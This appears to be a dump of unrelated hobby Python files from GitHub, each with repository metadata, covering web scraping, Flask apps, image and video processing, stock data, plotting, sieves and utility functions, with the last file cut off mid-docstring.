\"\"\"\ndef func1(arg1) -> None:\n a = 1\n b = 2\n raise ValueError('Hello world')\n\ndef func2():\n raise Exception\n\ndef func3(arg1):\n if arg1 > 2:\n raise TypeError\n\nclass CustomError(Exception):\n pass\n\ndef func4():\n raise CustomError('CustomError')\n\ndef func5():\n def func5_child1():\n raise ValueError\n\n return 1\n\ndef func6(arg1):\n if arg1 is None:\n raise TypeError\n\n return arg1 + 2\n\"\"\"\n\n\ndef testHasRaiseStatements() -> None:\n tree = ast.parse(srcRaises)\n visitor = HelperVisitor()\n visitor.visit(tree)\n result = visitor.raiseStatements\n\n expected = {\n (2, 0, 'func1'): True,\n (7, 0, 'func2'): True,\n (10, 0, 'func3'): True,\n (17, 0, 'func4'): True,\n (20, 0, 'func5'): False,\n (26, 0, 'func6'): True,\n (21, 4, 'func5_child1'): True,\n }\n\n assert result == expected\n","repo_name":"jsh9/pydoclint","sub_path":"tests/utils/test_returns_yields_raise.py","file_name":"test_returns_yields_raise.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"21"} +{"seq_id":"10438214437","text":"## getting data from web then upload it to database mysql\nimport requests\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport csv\nfrom itertools import zip_longest \n\nfrom flask import Flask ,render_template\nimport plotly.graph_objects as go\nfrom flask_mysqldb import MySQL \nimport mysql.connector\nimport streamlit as st\nimport csv \nimport pandas as pd\nimport plotly.express as px\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n\n\nlinks=[]\n\n\n#results_CAI_page=requests.get(\"https://www.flightstats.com/v2/flight-tracker/departures/CAI\")\n\n#src=results_CAI_page.content \n\n#soup=BeautifulSoup(src,\"html.parser\")\n\n\nwith open('fli_data/fli2.csv', 'r') as file:\n reader = csv.reader(file)\n #data = list(reader) \n for row in reader:\n #print(row[2])\n if len(links)==4 : break\n links.append(row[2])\n\nlinks_list=list(filter(None,links))\nprint(len(links_list))\n\n\n\n\n\ndep_sch_list=[]\ndep_act_list=[]\narr_sch_list=[]\narr_act_list=[]\nflight_from_list=[]\nflight_to_list=[]\nflight_from_airport_li=[]\nflight_to_airport_li=[]\ntime_stat_li=[]\nflight_code_li=[]\nflight_date_li=[]\nfrom_dep_li=[]\nflight_status_li=[]\n#to get into each link and get the data\nfor link_each_page in range(1,len(links_list)):\n results_link=requests.get(links_list[link_each_page])\n src=results_link.content \n #print(src)\n soup=BeautifulSoup(src,\"html.parser\")\n sched_depart=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 kbHzdx\"})\n flight=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 efwouT\"})\n flight_airport=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 cHdMkI\"})\n flight_code=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 OvgJa\"})\n flight_date=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 cPBDDe\"})\n flight_status=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 iicbYn\"})\n if flight_status[0].text in ['Arrived']:\n flight_link_fordetails=soup.find_all(\"a\",{\"class\":\"button-link__ButtonLink-sc-wcss74-0 dVTZZ\"})\n details_link=flight_link_fordetails[3].get('href')\n ##inside the link to get the weather wind \n res_detailed_link=requests.get(details_link)\n src1=res_detailed_link.content \n soup1=BeautifulSoup(src1,\"html.parser\")\n weather=soup1.find_all(\"div\",{\"class\":\"sc-frDJqD 
bMlduJ\"})\n\n\n print(weather)\n from_dep_li.append(\"CAI\")\n flight_date_li.append(flight_date[0].text)\n flight_code_li.append(flight_code[0].text)\n #time_stat=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 feVjck\"}) \n flight_from_list.append(flight[0].text)\n flight_to_list.append(flight[1].text)\n flight_from_airport_li.append(flight_airport[0].text)\n flight_to_airport_li.append(flight_airport[1].text)\n #time_stat_li.append(time_stat[0].text)\n #print(time_stat[0].text)\n dep_sch_list.append(sched_depart[0].text)\n #print(links_list[link_each_page])\n print(sched_depart[0].text)\n dep_act_list.append(sched_depart[1].text)\n arr_sch_list.append(sched_depart[2].text)\n arr_act_list.append(sched_depart[3].text)\n flight_status_li.append(flight_status[0].text)\n # print(flight_airport[1].text)\nprint(flight_status_li)\nprint(\"#########\")\n\n#print(flight_from_airport_li)\n###############################put lists in database\n\nmydb=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"vegatry1\",\n database=\"flaskapp\"\n)\n\n\n#button-link__ButtonLink-sc-wcss74-0 dVTZZ\n\n\n#mycursor=mydb.cursor(buffered=True) \n#print(from_dep_li)\n\n#for i in range(len(flight_code_li)):\n # print(len(flight_code_li))\n#(flight_code_li[0],flight_date[0],from_dep[0],flight_from_list[0],flight_to_list[0],flight_from_airport_li[0],flight_to_airport_li[0],dep_sch_list[0],dep_act_list[0],arr_sch_list[0],arr_act_list[0])\n# mycursor.execute(\"INSERT INTO fli_data_table(flight_code,flight_date,from_dep,flight_from,flight_to,airport_from,airport_to,dep_sch,dep_act,arr_sch,arr_act) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\",(\tflight_code_li[i]\t,flight_date_li[i]\t,from_dep_li[i]\t,flight_from_list[i],\tflight_to_list[i],\tflight_from_airport_li[i]\t,flight_to_airport_li[i],\tdep_sch_list[i]\t,dep_act_list[i],\tarr_sch_list[i]\t,arr_act_list[i]))\n \n #print(flight_date_li[i])\n#mydb.commit()\n#mycursor.close()\n\n######################get data from database########################\n#mycursor.execute()\n#myres=mycursor.fetchall()\n\n#df=pd.DataFrame(myres,columns=['flight_code','flight_date','from_dep','flight_from','flight_to','airport_from','airport_to','dep_sch','dep_act','arr_sch','arr_act','id'])\n#for row in myres:\n\n#def run_query(query):\n# with mydb.cursor() as cur:\n# cur.execute(query)\n# return cur.fetchall()\n\n#rows = run_query(\"Select * from fli_data_table\")\n#for row in rows:\n #print(row)\n","repo_name":"MennaNazmi/flight_delay1","sub_path":"app6.py","file_name":"app6.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37897360701","text":"# save this as app.py\nfrom flask import Flask, request, render_template\n\n# create an instance of the Flask class\napp = Flask(__name__)\n\n# define a function to check if a number is prime\ndef isPrime(n):\n # assume n is a positive integer\n if n == 1:\n return False\n elif n == 2:\n return True\n else:\n for i in range(2, int(n**0.5) + 1):\n if n % i == 0:\n return False\n return True\n\n# find the nearest prime number to n (not including n)\ndef nearestPrime(n):\n delta = 1\n # loop until a prime is found\n while True:\n if isPrime(n + delta):\n # return n + delta as the nearest prime\n return n + delta\n # check if n - delta is a prime and positive\n elif n - delta > 0 and isPrime(n - delta):\n return n - delta\n # increment the delta by 1\n else:\n delta += 1\n\n# define a route for the home 
\n# define a route for the home page\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef home():\n # initialize the result and number variables\n result = None\n number = None\n closest = None\n delta = None\n\n # check if the request method is POST\n if request.method == \"POST\":\n # get the number input from the form\n number = request.form.get(\"number\")\n\n # check if the number is valid\n try:\n number = int(number)\n if number < 1:\n raise ValueError\n\n # check if the number is prime and set the result accordingly\n if isPrime(number):\n result = \"prime\"\n else:\n result = \"not prime\"\n # find the nearest prime number\n closest = nearestPrime(number)\n delta = abs(number - closest)\n\n except (TypeError, ValueError):\n # handle invalid input, including a missing field where int(None) raises TypeError\n result = \"invalid\"\n\n # render the index.html template with the result and number variables\n return render_template(\"index.html\", result=result, number=number, closest=closest, delta=delta)\n\n# run the app\n# app.run()\n","repo_name":"gbowerman/prime","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23888330109","text":"import os\nimport json\nimport sys\nimport cv2\nimport numpy as np\n\nfrom tqdm import tqdm\n\nVIDEO_ROOT = '/media/vtouchinc02/database/RawData/deepfake'\nTAG_ROOT = '/media/vtouchinc02/database/RawData/deepfake-faces-retinaface-json-backup-clean-fake-results'\nOUTPUT_ROOT = '/media/vtouchinc02/database/RawData/deepfake-faces-retinaface-json-backup-clean-fake-results-images'\n\ndef get_frames(video_path, frame_idxs):\n capture = cv2.VideoCapture(video_path)\n\n frames = []\n idxs_read = []\n for frame_idx in range(frame_idxs[0], frame_idxs[-1] + 1):\n ret = capture.grab()\n if not ret:\n print(\"Error grabbing frame %d from movie %s\" % (frame_idx, video_path))\n break\n current = len(idxs_read)\n if frame_idx == frame_idxs[current]:\n ret, frame = capture.retrieve()\n if not ret or frame is None:\n print(\"Error retrieving frame %d from movie %s\" % (frame_idx, video_path))\n break\n frames.append(frame)\n idxs_read.append(frame_idx)\n\n return idxs_read, frames\n\n\nif __name__ == '__main__':\n if not os.path.isdir(OUTPUT_ROOT):\n os.mkdir(OUTPUT_ROOT)\n\n for i in range(50):\n folder_name = 'dfdc_train_part_%d' % i\n print(folder_name)\n\n output_folder = os.path.join(OUTPUT_ROOT, folder_name)\n if not os.path.isdir(output_folder):\n os.mkdir(output_folder)\n\n metadata_path = os.path.join(TAG_ROOT, folder_name + '/metadata.json')\n with open(metadata_path) as metadata_fp:\n metadata = json.load(metadata_fp)\n\n for video_name, attributes in tqdm(metadata.items()):\n # print(video_name)\n video_path = os.path.join(VIDEO_ROOT, folder_name + '/' + video_name)\n\n # Select frames\n dict_frame_face = {}\n if attributes['label'] == 'REAL':\n if not ('face' in attributes):\n print('No face in %s' % video_name)\n continue\n dict_frame_face = attributes['face']\n else:\n original_video_name = attributes['original']\n original_attributes = metadata[original_video_name]\n if not ('face' in original_attributes):\n print('No face in %s, %s' % (video_name, original_video_name))\n continue\n dict_frame_face = original_attributes['face']\n\n if len(dict_frame_face) == 0:\n print('Zero face in %s' % video_name)\n\n tagged_frame_indices = []\n for frame_index in dict_frame_face.keys():\n tagged_frame_indices.append(int(frame_index))\n\n frame_indices, frames = get_frames(video_path, 
tagged_frame_indices)\n\n for frame_index, frame in zip(frame_indices, frames):\n for face_index, detection_result in enumerate(dict_frame_face[str(frame_index)]):\n box = np.array(detection_result['box'])\n box = box.astype(int)\n face = frame[box[1]:box[3], box[0]:box[2]]\n if face.size == 0:\n continue\n path = os.path.join(output_folder, '%s-%d-%d.png' % (video_name[:-4], frame_index, face_index))\n cv2.imwrite(path, face)\n\n output_metadata_path = os.path.join(output_folder, 'metadata.json')\n with open(output_metadata_path, \"w\") as fp:\n json.dump(metadata, fp)\n","repo_name":"poperson1205/VTouchDFDC","sub_path":"store_faces.py","file_name":"store_faces.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22006981766","text":"import random\nimport time\nfrom functools import wraps\nfrom logging import Logger\nfrom logging import getLogger\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Optional\n\nlog = getLogger(__name__)\n\n\ndef decorrelated_jitter(\n max_retry: int = 1,\n cap: float = 60.0,\n base: float = 1.0,\n logger: Optional[Logger] = None,\n log_level: Optional[str] = \"WARNING\",\n) -> Callable[[Callable[..., Any]], Callable[..., Any]]:\n \"\"\"Retry a function up to ``max_retry`` times upon failure.\n\n In the following example, the decorated function is retried up to three times if an\n exception occurs::\n\n >>> @decorrelated_jitter(3)\n >>> def func():\n >>> # operation(s) to be retried after an Exception.\n\n In between retries, there will be a sleep, determined by decorrelated jitter based\n on ``cap`` and ``base`` values, where the first sleep is ``t = base`` with the\n subsequent sleeps given by ``t = min(cap, random_between(base, t * 3))`` (see\n [#ref_decorrelated_jitter]).\n\n Args:\n max_retry: The max number the decorated function is\n retried.\n cap: The maximum sleep time in seconds.\n base: The base sleep time in seconds.\n logger: The logger to which logging messages are sent.\n log_level: Logging level. If :obj:`None`, no retry message gets logged.\n\n Raises:\n The last exception raised by the wrapped function after the final retry.\n\n Returns:\n Wrapped function.\n\n .. 
[#ref_decorrelated_jitter] https://www.awsarchitectureblog.com/2015/03/backoff.html\n \"\"\"\n log = logger or globals()[\"log\"]\n log_level = log_level.lower() if log_level else None\n\n def _retry(f, *args, **kwargs):\n @wraps(f)\n def _wrapper(*args, **kwargs):\n dt = base\n error = None\n for trial in range(max_retry):\n try:\n rv = f(*args, **kwargs)\n except Exception as exc:\n dt = min(cap, random.uniform(base, dt * 3.0))\n if log_level is not None:\n getattr(log, log_level)(\n \"Retry %d/%d of %s in %.3f sec after %r\",\n trial + 1,\n max_retry,\n f.__name__,\n dt,\n exc,\n )\n time.sleep(dt)\n error = exc\n continue\n else:\n return rv\n else:\n raise error\n\n return _wrapper\n\n return _retry\n","repo_name":"okomestudio/pyaides","sub_path":"src/pyaides/functools/retries.py","file_name":"retries.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10350439825","text":"import random\n\nwheel = set(range(0,37))\nwheel.add('00')\nred = {1,3,5,7,9,12,14,16,18,19,21,23,25,27,30,32,34,36}\nblack = set(range(1,37)) - red\ngreen = {0,'00'}\neven = set(range(2,37,2))\nodd = set(range(1,37)) - even\nsmall = set(range(1,19))\ngreat = set(range(19,37))\nproperties = {'red':red, 'black':black, 'even':even, 'odd':odd, 'small':small, 'great':great, 'green':green}\n\nmoney = int(input('How many $ do you want to play with: '))\nbet = int(input(\"Give your bet: \"))\npred = input('Give me the next number property: ')\n\nwhile bet != 0:\n try:\n properties[pred]\n num = random.choice(list(wheel))\n flag = False\n print(num)\n\n for k in properties:\n if num in properties[k]:\n #print(k)\n if pred == k:\n flag = True\n if flag == True:\n money += bet\n print('Win!\\n')\n\n else:\n money -= bet\n print('Lose!\\n')\n if money <= 0:\n break\n\n bet = int(input(\"Give your bet: \"))\n if bet != 0:\n pred = input('Give me the next number property: ')\n\n except KeyError:\n print('You should select one of the real properties!')\n pred = input('Give me the next number property!\\n')\n bet = int(input(\"Give your bet: \"))\n","repo_name":"davidhimer/Homeworks","sub_path":"LuckyWheel.py","file_name":"LuckyWheel.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16454819162","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 26 18:06:17 2021\n\n@author: m.perez-chuecos\n\"\"\"\n\nimport yfinance as yf\nimport pandas as pd\nimport sqlite3\nfrom sqlalchemy import *\n\nstock_name=\"VIS.MC\"\nstock = yf.Ticker(stock_name)\n\n# get stock info\n# stock.info\n\n# get historical market data\nhist = stock.history(period=\"5y\")\n\n\nhist2017=hist.loc['2017-01-01':'2017-12-31']\nhist2018=hist.loc['2018-01-01':'2018-12-31']\nhist2019=hist.loc['2019-01-01':'2019-12-31']\nhist2020=hist.loc['2020-01-01':'2020-12-31']\n\ncurrency_to_usd_dict={\n 'USD': 1,\n 'EUR': 0.87,\n 'JPY': 0.0088,\n 'CNY': 0.15,\n 'CAD': 0.77,\n 'HKD': 0.12,\n 'CHF': 1.08,\n }\n\nreport_currency= stock.info['financialCurrency']\nstock_currency= stock.info['currency']\nprice=stock.info['currentPrice']\n\nstock_currency_to_usd_conversion_factor= currency_to_usd_dict[stock_currency]\nreport_currency_to_usd_conversion_factor= currency_to_usd_dict[report_currency]\n\nprice_conversion_factor=stock_currency_to_usd_conversion_factor/report_currency_to_usd_conversion_factor\n\nCompanyPriceDataBase=pd.Series({\n 'Ticker': stock_name,\n 'CurrentPrice': 
price*price_conversion_factor,\n 'ReportCurrency':report_currency,\n 'StockCurrency':stock_currency,\n\n '2020MeanPrice': (hist2020['Open'].mean())*price_conversion_factor,\n '2020MaxPrice': (hist2020['High'].max())*price_conversion_factor,\n '2020MinPrice': (hist2020['Low'].min())*price_conversion_factor,\n\n '2019MeanPrice': (hist2019['Open'].mean())*price_conversion_factor,\n '2019MaxPrice': (hist2019['High'].max())*price_conversion_factor,\n '2019MinPrice': (hist2019['Low'].min())*price_conversion_factor,\n\n '2018MeanPrice': (hist2018['Open'].mean())*price_conversion_factor,\n '2018MaxPrice': (hist2018['High'].max())*price_conversion_factor,\n '2018MinPrice': (hist2018['Low'].min())*price_conversion_factor,\n\n '2017MeanPrice': (hist2017['Open'].mean())*price_conversion_factor,\n '2017MaxPrice': (hist2017['High'].max())*price_conversion_factor,\n '2017MinPrice': (hist2017['Low'].min())*price_conversion_factor,\n \n })\n\nCompanyPriceDataBase=CompanyPriceDataBase.to_frame().T\n#FundamentalmentalAnalysisDataBase=FundamentalmentalAnalysisDataBase.set_index(['Ticker'])\n\ntry:\n sqliteConnection = sqlite3.connect('../db/Fundamentals.db')\n cur = sqliteConnection.cursor()\n engine = create_engine('sqlite:///../db/Fundamentals.db', echo=False)\n conn = engine.raw_connection()\n cursor = conn.cursor()\n # print(\"Database created and Successfully Connected to SQLite\")\n\n try:\n CompanyPricesOld = pd.read_sql_table('CompanyPrices', engine)\n except:\n print('Empty CompanyPrices table')\n\n try:\n if stock_name in CompanyPricesOld['Ticker'].tolist():\n print(CompanyPricesOld['Ticker'])\n TickerToUpdateIndex = CompanyPricesOld['Ticker'].tolist().index(stock_name)\n CompanyPricesOld.loc[TickerToUpdateIndex] = CompanyPriceDataBase.loc[0]\n CompanyPricesOld.to_sql(\"CompanyPrices\", conn, if_exists='replace', index=False)\n else:\n CompanyPriceDataBase.to_sql(\"CompanyPrices\", conn, if_exists='append', index=False)\n except:\n CompanyPriceDataBase.to_sql(\"CompanyPrices\",conn, if_exists='append', index=False)\n \n \n\n record = cur.fetchall()\n cur.close()\n\nexcept sqlite3.Error as error:\n print(\"Error while connecting to sqlite\", error)\nfinally:\n if sqliteConnection:\n sqliteConnection.close()\n print(\"The SQLite connection is closed\")\n\n# Save (commit) the changes\nconn.commit()\n\n# Just be sure any changes have been committed or they will be lost.\nconn.close()\n","repo_name":"martinpcs21/stockcomparator","sub_path":"src/core/legacy/GetCompanyPrices.py","file_name":"GetCompanyPrices.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7514407713","text":"import os\r\nfrom pathlib import Path\r\n\r\nextensions = {\r\n \"DOCUMENTS\":[\".pdf\", \".docx\", \".txt\",\".exe\"],\r\n \"AUDIO\":[\".m4a\", \".m4b\", \".mp3\"], \r\n \"IMAGES\":[\".jpg\", \".jpeg\", \".png\"]\r\n}\r\n\r\ndef pickDir(value):\r\n for category, ekstensi in extensions.items():\r\n for suffix in ekstensi:\r\n if suffix == value:\r\n return category\r\n \r\n\r\ndef organize():\r\n for items in os.scandir():\r\n if items.is_dir():\r\n continue\r\n\r\n filePath = Path(items)\r\n fileType = filePath.suffix.lower()\r\n directory = pickDir(fileType)\r\n\r\n if directory == None:\r\n quit()\r\n\r\n directoryPath = Path(directory)\r\n if directoryPath.is_dir() != True:\r\n directoryPath.mkdir()\r\n 
filePath.rename(directoryPath.joinpath(filePath))\r\n\r\n\r\norganize()\r\n","repo_name":"brettsullivan98/FileAutomation","sub_path":"fileauto.py","file_name":"fileauto.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41261541957","text":"#!/usr/bin/python3\n\nnums = list(range(0, 100))\nd = 2\nwhile d <= 10:\n i = 0\n for x in nums:\n if x is not None and x % d == 0 and x != d:\n nums[i] = None\n i += 1\n d += 1\nprint(nums)\n","repo_name":"nonZero/demos-python","sub_path":"src/exercises/basic/primes/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43126432788","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/76501?language=python3\n\ndef soloution(absolutes, signs):\n # sings 가 참이면 해당 absoluted은 실제 정수가 양수, 거짓이면 음수 \n # 주어진 수에 하나씩 접근\n # 양수, 음수가 적용된 실제 합\n answer = 0\n for i in range(len(absolutes)):\n if signs[i]:\n answer += absolutes[i]\n else:\n answer -= absolutes[i]\n return answer ","repo_name":"nevertheless0404/Study_slowly","sub_path":"2022.08.21/음양더하기.py","file_name":"음양더하기.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18249619363","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nImplémentations du crible d'Ératosthène\n\"\"\"\n\n\n__author__ = \"Sébastien CHAZALLET\"\n__copyright__ = \"Copyright 2012\"\n__credits__ = [\"Sébastien CHAZALLET\", \"InsPyration.org\", \"Éditions ENI\"]\n__license__ = \"GPL\"\n__version__ = \"1.0\"\n__maintainer__ = \"Sébastien CHAZALLET\"\n__email__ = \"pythoniste@protonmail.com\"\n__status__ = \"Production\"\n\n\nfrom itertools import cycle\nfrom array import array\nfrom time import time\nimport os\n\n\ndef infos() -> dict:\n \"\"\"Empreinte mémoire du processus courant\"\"\"\n\n with open('/proc/%d/status' % os.getpid()) as t:\n v = t.read()\n return dict(\n [\n [b.strip() for b in a.split(':')]\n for a in v.splitlines()\n ]\n )\n\n\ndef memory() -> tuple[str, str, str, str]:\n \"\"\"Renvoie des informations spécifiques parmi le dictionnaire d'information général\"\"\"\n i = infos()\n return i['VmSize'], i['VmStk'], i['VmData'], i['VmRSS']\n\n\ndef crible1(m: int) -> list:\n \"\"\"Algorithme classique pour le crible d'Ératosthène\"\"\"\n res, n = [i for i in range(2, m+1)], 2\n while n:\n for i in res[res.index(n)+1:]:\n if i % n == 0:\n res.remove(i)\n if res.index(n) + 1 < len(res):\n n = res[res.index(n) + 1]\n else:\n return res\n\n\ndef crible2(m: int) -> list:\n \"\"\"Algorithme pythonique pour le crible d'Ératosthène\"\"\"\n\n res = [i for i in range(m+1)]\n res[1], n = 0, 2\n while n**2 <= m:\n res[n*2::n], n = [0] * len(res[n*2::n]), n+1\n while not res[n]:\n n += 1\n return [i for i in res if i != 0]\n\n\ndef crible3(m: int) -> list:\n \"\"\"Algorithme alternatif\"\"\"\n\n found, numbers, i = [], [], 2\n while i <= m:\n if i not in numbers:\n found.append(i)\n for j in range(i, m+1, i):\n numbers.append(j)\n i += 1\n return found\n\n\ndef crible4(m: int) -> list:\n \"\"\"Algorithme alternatif\"\"\"\n\n if m < 2**31:\n t = 'i'\n else:\n if m >= 2**64:\n print('AVERTISSEMENT, le maximum a été limité à %s' % 2**64-1)\n t = 'L'\n l, n = array(t), 2\n l.extend([i for i in range(m+1)])\n while n**2 <= m:\n l[n*2::n], n = array(t, [0]*(m//n-1)), n+1\n while not l[n]:\n n += 
1\n return [i for i in l if i != 0]\n\n\ndef test() -> dict[int, tuple[float, float, float, float]]:\n \"\"\"Mise en évidence des performances des deux algorithmes\"\"\"\n\n data = {}\n # memos = {}\n for m in [10, 100, 1000, 10000]:\n # m0=memory()\n t0 = time()\n crible1(m)\n t1 = time()\n # m1=memory()\n t2 = time()\n crible2(m)\n t3 = time()\n # m2=memory()\n t4 = time()\n crible3(m)\n t5 = time()\n # m3=memory()\n t6 = time()\n crible4(m)\n t7 = time()\n # m4=memory()\n data[m] = (t1-t0, t3-t2, t5-t4, t7-t6)\n # memos[m] = (m0, m1, m2, m3, m4)\n return data # , memos\n\n\nif __name__ == \"__main__\":\n sep = '+---------+-----------+------------+----------+------------+------------+'\n title = 'Crible'.center(len(sep)-2).center(len(sep), '|')\n head = '| maximum | classique | pythonique | gain (%) | alternatif | alternatif |'\n body = '| %7d | %9.7f | %9.7f | %8.2f | %9.7f | %9.7f |'\n memo = '| %7s | %9s | %9s | | %9s | %9s |'\n # datas, memos = test()\n datas = test()\n\n for s in [sep, title, sep, head]:\n print(s)\n\n keys = list(datas.keys())\n keys.sort()\n for k in keys:\n d = datas[k]\n d = (k,) + d[:2] + (100. * d[1] / d[0],) + d[2:]\n print(body % d)\n # for i, v in zip(('VmSize', 'VmStk', 'VmData', 'VmRSS'), memos[k]):\n # i=(i,)+v\n # print(memo % i)\n # print(sep)\n print(sep)\n","repo_name":"pythoniste/eni_codes","sub_path":"Types/eratosthene.py","file_name":"eratosthene.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33782023681","text":"import vtk\n\ncolors = vtk.vtkNamedColors()\n\ndicomImageReader = vtk.vtkDICOMImageReader()\n\nvolMap = vtk.vtkSmartVolumeMapper()\nvolMap.SetBlendModeToComposite()\nvolMap.SetRequestedRenderModeToGPU()\n\nvolProperty = vtk.vtkVolumeProperty()\nvolProperty.ShadeOn()\nvolProperty.SetInterpolationTypeToLinear()\nvolProperty.SetAmbient(0.4)\nvolProperty.SetDiffuse(1.0)\nvolProperty.SetSpecular(0.4)\n\ngradientOpacity = vtk.vtkPiecewiseFunction()\nscalarOpacity = vtk.vtkPiecewiseFunction()\ncolor = vtk.vtkColorTransferFunction()\n\nwinToImg = vtk.vtkWindowToImageFilter()\nwriter = vtk.vtkPNGWriter()","repo_name":"dobatruong1111/3dssr","sub_path":"settings/globalvars.py","file_name":"globalvars.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70445533173","text":"import pygal\r\nfrom utils import save_pygal, get_population_data\r\nfrom pygal.style import Style\r\n\r\n\r\ncustom_style = Style(\r\n background='transparent',\r\n label_font_size=16,\r\n legend_font_size=20,\r\n title_font_size= 25,\r\n major_label_font_size = 16,\r\n minor_label_font_size = 16,\r\n value_label_font_size = 16,\r\n tooltip_font_size=20)\r\n\r\n\r\n# Read the data and choose its subset\r\ndata = get_population_data(\"../data/clean_data.csv\")\r\n\r\nline_chart = pygal.Line(height=550, width=1200,\r\n truncate_label=False, x_label_rotation=90,\r\n value_formatter=lambda x: '{} mln'.format(x),\r\n style=custom_style,\r\n print_labels=True)\r\n\r\nline_chart.title = 'Population in Poland and its neighbors across the years'\r\nline_chart.x_title= 'Years'\r\nline_chart.y_title = 'Country population\\n[mln]'\r\nlabels = [str(i) for i in list(data[\"variable\"].unique())]\r\nline_chart.x_labels = labels\r\n\r\nfor country, data_for_country in data.groupby(\"Country Name\"):\r\n line_chart.add(country, [round(i/1000000, 2) for i in 
data_for_country.value.to_list()])\r\n\r\nsave_pygal(line_chart, \"pygal_plot1_data1\")\r\n","repo_name":"zofiakk/DAV","sub_path":"lab8/scripts/pygal_plot1_data1.py","file_name":"pygal_plot1_data1.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70535525174","text":"from PIL import Image\n\n\ndef mergeImagesHorizontally(images, coordinate):\n # create two lists - one for heights and one for widths\n widths, heights = zip(*(i.size for i in images))\n resultWidth = sum(widths)\n resultheight = min(heights) # take minimum height\n # create new image\n resultImage = Image.new('RGB', (resultWidth, resultheight))\n nextImagePosition = 0\n for im in images:\n resultImage.paste(im, (nextImagePosition, 0))\n nextImagePosition += im.size[0] # position for the next image\n resultImage.save('final'+str(coordinate)+'.jpg')\n\n\ndef mergeImagesVertically(images):\n # create two lists - one for heights and one for widths\n widths, heights = zip(*(i.size for i in images))\n resultWidth = min(widths) # take minimum width\n resultheight = sum(heights)\n # create new image\n resultImage = Image.new('RGB', (resultWidth, resultheight))\n nextImagePosition = 0\n for im in images:\n resultImage.paste(im, (0, nextImagePosition))\n nextImagePosition += im.size[1] # position for the next image\n resultImage.save('final-merged-map.jpg')\n\n\ndef main():\n \"\"\"This code works in two parts.\n\n The first part generates horizontal slices while the second part\n merges all the horizontal slices into the complete map.\n \"\"\"\n listOfRows = []\n for x in range(-10, 10):\n \"\"\"Here, we generate a list of lists, with each list element containing\n one row of filepaths of the 20x20 grid, making for a total of 20\n rows.\"\"\"\n imageRow = []\n for y in range(-10, 10):\n filepath = 'tile-'+str(y)+'_'+str(x)+'.jpg'\n imageRow.append(filepath)\n listOfRows.append(imageRow)\n\n listOfMergedRows = []\n\n for x in range(20):\n '''Here, we loop through the list of rows and horizontally\n merge each row, and generate a list of filepaths of\n horizontal strips for the next step.'''\n imgs = [Image.open(im) for im in listOfRows[x]]\n mergeImagesHorizontally(imgs, x)\n\n '''Since we traverse from -10 to 10, we reverse the filepath order\n for the final merge so as not to end up with a reversed merge'''\n listOfMergedRows.append('final'+str(19-x)+'.jpg')\n\n # Finally, we merge the horizontal strip into one complete image\n images = [Image.open(im) for im in listOfMergedRows]\n mergeImagesVertically(images)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"TheAntiSnipe/marauders-map","sub_path":"python-scripts/map-merge.py","file_name":"map-merge.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22186714294","text":"\"\"\"Temporary collection of utility functions.\nTODO:\n- determine better utility strategy to avoid import errors.\n- keywords should be extracted as constants.\n\"\"\"\nfrom datetime import date\nimport os\nimport re\nimport time\n\nimport json\nimport pandas as pd\nimport tweepy\n\n\ndef search_past_7_days(search_term, api, *, max_tweets=100, language=\"en\"):\n \"\"\"Returns specified number of tweets within the last 7 days.\n\n Parameters\n ----------\n search_term: :obj:`str`\n Search query.\n max_tweets: :obj:`int`\n Maximum number of tweets to be scraped. 
